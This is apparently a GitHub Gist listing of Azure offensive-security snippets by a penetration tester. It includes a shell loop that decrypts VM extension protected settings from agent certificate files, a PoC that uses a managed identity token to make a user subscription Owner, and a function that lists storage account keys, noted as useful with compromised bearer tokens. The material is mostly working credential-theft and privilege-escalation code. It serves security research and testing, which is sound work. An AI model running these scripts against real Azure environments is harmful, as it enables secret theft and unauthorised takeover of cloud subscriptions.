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kfosaaen /
Created March 13, 2024 19:25
Dump Azure Linux VM Extension Protected Settings
# Find all ".settings" files in "/var/lib/waagent/" subdirectories
find /var/lib/waagent/ -type f -name "*.settings" -print0 | while IFS= read -r -d $'\0' file; do
thumbprint=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettingsCertThumbprint' $file)
protectedSettingsDecrypted=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettings' $file | base64 --decode | openssl smime -inform DER -decrypt -recip /var/lib/waagent/$thumbprint.crt -inkey /var/lib/waagent/$thumbprint.prv | jq .)
echo "File: $file"
echo "Public Settings: $publicSettings"
echo "Decrypted Protected Settings: $protectedSettingsDecrypted"
kfosaaen / MI-Owner-Escalation.ps1
Created February 14, 2020 21:50
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri '' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId
#---------Get OAuth Token---------#
$response = Invoke-WebRequest -Uri '' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
kfosaaen / AppRegRoleFinder.ps1
Created March 8, 2023 22:57
PowerShell 3-liner to find roles attached to your current user
# Get a token and split out the payload
$token = ((Get-AzAccessToken).Token).Split(".")[1].Replace('-', '+').Replace('_', '/')
# Add padding, if needed
while ($token.Length % 4) {$token += "="}
# Base64 Decode, convert from json, extract OID, pass into filter for Get-AzRoleAssignment to find current roles
Get-AzRoleAssignment | where ObjectId -EQ ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($token)) | ConvertFrom-Json).oid
kfosaaen / get-MIStorageKeys.ps1
Last active November 1, 2022 02:48
A PowerShell function to call Azure rest APIs using a VM Managed Identity to list available Storage Account access keys
Function get-MIStorageKeys{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts)